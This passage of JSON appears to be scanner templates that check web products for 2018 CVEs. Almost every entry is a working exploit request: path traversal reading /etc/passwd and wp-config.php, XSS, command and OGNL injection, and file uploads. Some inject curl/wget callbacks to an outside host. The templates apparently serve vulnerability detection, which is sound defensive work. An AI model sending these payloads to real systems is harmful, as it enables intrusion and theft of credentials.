support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: 